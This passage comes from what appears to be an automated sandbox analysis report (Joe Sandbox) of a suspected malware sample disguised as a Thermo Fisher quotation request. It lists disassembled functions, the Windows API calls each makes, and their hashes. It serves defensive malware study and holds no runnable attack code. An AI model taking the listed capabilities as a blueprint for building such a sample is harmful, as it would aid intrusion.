                                                              • Instruction Fuzzy Hash: 83219776601219BFEB10AF78DC88DEB73EDEF09360B048126FA15DB291D670EC458760
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 1a424946a69d289494dc0913b7abf233b489b6b180058496197eeac7f6eebbd4
                                                              • Instruction ID: 310037f97d508c7bdab9bf7c823bdff8b0bb319283db6ce3d6b644dd68d68760
                                                              • Opcode Fuzzy Hash: 1a424946a69d289494dc0913b7abf233b489b6b180058496197eeac7f6eebbd4
                                                              • Instruction Fuzzy Hash: 67216A71244512B7C724AB34DD22FFB73DBEF65310FB44029F44697182E6659982C3A8
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006409CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006409F1
                                                              • SysAllocString.OLEAUT32(00000000), ref: 006409F4
                                                              • SysAllocString.OLEAUT32 ref: 00640A15
                                                              • SysFreeString.OLEAUT32 ref: 00640A1E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00640A38
                                                              • SysAllocString.OLEAUT32(?), ref: 00640A46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: df2b72c82173a49175a82525588a86d962e829d042b06a5cfd5fb8e69b2b11fb
                                                              • Instruction ID: ce9f60be7e97c1da1edbd890cb40c4848f30827c9131867ce21cede56a401942
                                                              • Opcode Fuzzy Hash: df2b72c82173a49175a82525588a86d962e829d042b06a5cfd5fb8e69b2b11fb
                                                              • Instruction Fuzzy Hash: 0F218875600214BFEB10DFB8DC88DAA77EDEF083607048125FA09CB2A1DA70EC818B64
                                                              APIs
                                                                • Part of subcall function 0061D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0061D1BA
                                                                • Part of subcall function 0061D17C: GetStockObject.GDI32(00000011), ref: 0061D1CE
                                                                • Part of subcall function 0061D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0061D1D8
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0066A32D
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0066A33A
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0066A345
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0066A354
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0066A360
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: cb1f594d315df0b9e7da16db90288c67fbeb6b00731d7d8adb3fafe7f59768e3
                                                              • Instruction ID: a0c9bd95e1bb2a0589b8558fb4eb5b707ad4d6a4f4f9201978ff61b3add9de2d
                                                              • Opcode Fuzzy Hash: cb1f594d315df0b9e7da16db90288c67fbeb6b00731d7d8adb3fafe7f59768e3
                                                              • Instruction Fuzzy Hash: ED1193B1150219BEEF115FA0CC85EE77F6EFF09798F014114BA04A61A0C6729C21DBA4
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0061CCF6
                                                              • GetWindowRect.USER32(?,?), ref: 0061CD37
                                                              • ScreenToClient.USER32(?,?), ref: 0061CD5F
                                                              • GetClientRect.USER32(?,?), ref: 0061CE8C
                                                              • GetWindowRect.USER32(?,?), ref: 0061CEA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$Window$Screen
                                                              • String ID:
                                                              • API String ID: 1296646539-0
                                                              • Opcode ID: 67082569c064f167b8094db36fec9ca38ba09b125dad0e8d0caaea6c3f0cac45
                                                              • Instruction ID: 13eebe4f444963c49485f3e5deabc6a372593a0bd52be445c81185ce1bb939ed
                                                              • Opcode Fuzzy Hash: 67082569c064f167b8094db36fec9ca38ba09b125dad0e8d0caaea6c3f0cac45
                                                              • Instruction Fuzzy Hash: 91B14979900249DBDF10CFA8C4807EDBBB2FF08310F189569EC59EB250DB31A995CB65
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00661C18
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00661C26
                                                              • __wsplitpath.LIBCMT ref: 00661C54
                                                                • Part of subcall function 00621DFC: __wsplitpath_helper.LIBCMT ref: 00621E3C
                                                              • _wcscat.LIBCMT ref: 00661C69
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00661CDF
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00661CF1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID:
                                                              • API String ID: 1380811348-0
                                                              • Opcode ID: a2ebbabe84a32ef5ea7f7da2092aa8ee5e956185f1c0c918859b1c51bff681dc
                                                              • Instruction ID: b90b851d9c65a73030ab3864eb12c1df059a1ebc588992d9be94c1a86ed4f06f
                                                              • Opcode Fuzzy Hash: a2ebbabe84a32ef5ea7f7da2092aa8ee5e956185f1c0c918859b1c51bff681dc
                                                              • Instruction Fuzzy Hash: 82518FB1144300AFD724EF24D895EABB7EDEF88754F044A1EF98597291DB30D904CBA6
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006630AF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006630EF
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00663112
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0066313B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0066317E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0066318B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: 45b18bee68e0f2c6f1cf387fba2bd3fd9f886d5044e1655220f658f169213c15
                                                              • Instruction ID: 16daf242f2932486136497e80656dbad0d8c52c744a24bf4f535ee1396a88af1
                                                              • Opcode Fuzzy Hash: 45b18bee68e0f2c6f1cf387fba2bd3fd9f886d5044e1655220f658f169213c15
                                                              • Instruction Fuzzy Hash: 91515871104300AFC748EF64C885EABBBEAFF89314F044A1DF555872A1DB31EA09CB56
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00668540
                                                              • GetMenuItemCount.USER32(00000000), ref: 00668577
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0066859F
                                                              • GetMenuItemID.USER32(?,?), ref: 0066860E
                                                              • GetSubMenu.USER32(?,?), ref: 0066861C
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0066866D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: e5a6d528e20661f8baf32db5bbfbf379cd3d099ad810b28cef0a04e416ebe29e
                                                              • Instruction ID: 4810eae0afc3370cd5b08963c3a27f46f8cc16fe83bfe65d301660d87c4bd186
                                                              • Opcode Fuzzy Hash: e5a6d528e20661f8baf32db5bbfbf379cd3d099ad810b28cef0a04e416ebe29e
                                                              • Instruction Fuzzy Hash: 0251BD71A00219AFCF55EF64C841AEEB7F6EF48310F108599E906FB391DB70AE418B95
                                                              APIs
                                                              • _memset.LIBCMT ref: 00644B10
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00644B5B
                                                              • IsMenu.USER32(00000000), ref: 00644B7B
                                                              • CreatePopupMenu.USER32 ref: 00644BAF
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00644C0D
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00644C3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: bd0162f2530b25ae3758f1ac5c3a60ea13faa1a6cc833c475180e9c9b7993b5b
                                                              • Instruction ID: 1110e7e2e67e0d11768b5041e3cea1b6901fdb8ccfa0b675b60669258e09b988
                                                              • Opcode Fuzzy Hash: bd0162f2530b25ae3758f1ac5c3a60ea13faa1a6cc833c475180e9c9b7993b5b
                                                              • Instruction Fuzzy Hash: 6951CF70602219EFDF20CF68D8CABEDBBF6EF44318F184159E4159B291EB709945CB61
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0069DC00), ref: 00658E7C
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658E89
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00658EAD
                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00658EC5
                                                              • _strlen.LIBCMT ref: 00658EF7
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658F6A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_strlenselect
                                                              • String ID:
                                                              • API String ID: 2217125717-0
                                                              • Opcode ID: 1c2e026b2ada0ac1afd42c882e8b1f8c4117899633c0aef6cbece4f6c487579f
                                                              • Instruction ID: 8d793cbcbc2536c8af0c440769439a553d5087396e1de8a5e1ab694d4e759f11
                                                              • Opcode Fuzzy Hash: 1c2e026b2ada0ac1afd42c882e8b1f8c4117899633c0aef6cbece4f6c487579f
                                                              • Instruction Fuzzy Hash: 3F419E71500204AFCB58EBA4C986EEEB7BBAF58311F104259F516A72D1DF30AE04CB64
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • BeginPaint.USER32(?,?,?), ref: 0061AC2A
                                                              • GetWindowRect.USER32(?,?), ref: 0061AC8E
                                                              • ScreenToClient.USER32(?,?), ref: 0061ACAB
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0061ACBC
                                                              • EndPaint.USER32(?,?,?,?,?), ref: 0061AD06
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0067E673
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                              • String ID:
                                                              • API String ID: 2592858361-0
                                                              • Opcode ID: 62f2dda349bc4047f610cb5549317a25da69583d1852350b7b3ea39dbf36ea75
                                                              • Instruction ID: 1b908c79f7b255923e4d79f0ecc3291336d615ed296481353ca0bf1feea44fa5
                                                              • Opcode Fuzzy Hash: 62f2dda349bc4047f610cb5549317a25da69583d1852350b7b3ea39dbf36ea75
                                                              • Instruction Fuzzy Hash: 5241D470105300AFC710DF65DC84FB67BBAEF5A320F08065DF9A48B2A2C3319985DBA2
                                                              APIs
                                                              • ShowWindow.USER32(006C1628,00000000,006C1628,00000000,00000000,006C1628,?,0067DC5D,00000000,?,00000000,00000000,00000000,?,0067DAD1,00000004), ref: 0066E40B
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0066E42F
                                                              • ShowWindow.USER32(006C1628,00000000), ref: 0066E48F
                                                              • ShowWindow.USER32(00000000,00000004), ref: 0066E4A1
                                                              • EnableWindow.USER32(00000000,00000001), ref: 0066E4C5
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066E4E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 1b8bad6182adf73f47cb2975bdd25e52de8b7d0172291d8cd75ffdbef6355589
                                                              • Instruction ID: e42c54904558602db4d0adc0a307106447469ac5ecc7010b2a2793863bc4a985
                                                              • Opcode Fuzzy Hash: 1b8bad6182adf73f47cb2975bdd25e52de8b7d0172291d8cd75ffdbef6355589
                                                              • Instruction Fuzzy Hash: 1D414138601145EFDB26CF34C499BD47BE2BF09704F5841A9EA598F2A2CB32AC45CB61
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 006498D1
                                                                • Part of subcall function 0061F4EA: std::exception::exception.LIBCMT ref: 0061F51E
                                                                • Part of subcall function 0061F4EA: __CxxThrowException@8.LIBCMT ref: 0061F533
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00649908
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00649924
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0064999E
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006499B3
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 006499D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 2537439066-0
                                                              • Opcode ID: ca769dd06bc3978dd5b640acd8fb49cffdfc9d01819b42b7011879fae26be8d1
                                                              • Instruction ID: 25653aad7a51913955c7700fb7d55cacf062dccf772d306582830ff65e41b811
                                                              • Opcode Fuzzy Hash: ca769dd06bc3978dd5b640acd8fb49cffdfc9d01819b42b7011879fae26be8d1
                                                              • Instruction Fuzzy Hash: C1317031900105ABDB50EF95DC85EABBBBAFF45310B1881A9F904AB286D734DA50DBA4
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,006577F4,?,?,00000000,00000001), ref: 00659B53
                                                                • Part of subcall function 00656544: GetWindowRect.USER32(?,?), ref: 00656557
                                                              • GetDesktopWindow.USER32 ref: 00659B7D
                                                              • GetWindowRect.USER32(00000000), ref: 00659B84
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00659BB6
                                                                • Part of subcall function 00647A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              • GetCursorPos.USER32(?), ref: 00659BE2
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00659C44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: c226b219e0c8fdf2eaeb8d58ed2c459680920861577b1a00799e3dcd8aac3015
                                                              • Instruction ID: 8687cba37edbd3897716b101646aa5ca00a41b5978e991087395055108e2e412
                                                              • Opcode Fuzzy Hash: c226b219e0c8fdf2eaeb8d58ed2c459680920861577b1a00799e3dcd8aac3015
                                                              • Instruction Fuzzy Hash: 0631C172104309ABD710DF14D849F9BB7EAFF89314F000A1AF985D7281D671E948CBA2
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0063AFAE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0063AFB5
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0063AFC4
                                                              • CloseHandle.KERNEL32(00000004), ref: 0063AFCF
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0063AFFE
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 0063B012
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: de59642362b914f535eefda9305a9cfe8e5e52e0432977d29e76c31d46c35029
                                                              • Instruction ID: f46b5da9d76c082e8bb5899515c6698947b798387c916a07b17562f04591085b
                                                              • Opcode Fuzzy Hash: de59642362b914f535eefda9305a9cfe8e5e52e0432977d29e76c31d46c35029
                                                              • Instruction Fuzzy Hash: 64215E72100209BFDF129F94DD09FEE7BAAEF44344F145119FA41A21A1C3769D21EBA1
                                                              APIs
                                                                • Part of subcall function 0061AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0061AFE3
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061AFF2
                                                                • Part of subcall function 0061AF83: BeginPath.GDI32(?), ref: 0061B009
                                                                • Part of subcall function 0061AF83: SelectObject.GDI32(?,00000000), ref: 0061B033
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0066EC20
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 0066EC34
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0066EC42
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 0066EC52
                                                              • EndPath.GDI32(00000000), ref: 0066EC62
                                                              • StrokePath.GDI32(00000000), ref: 0066EC72
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: c4f5e496ee5bc32615eb079498c3a46edf905cf46feecbe384a11bb06f1765bf
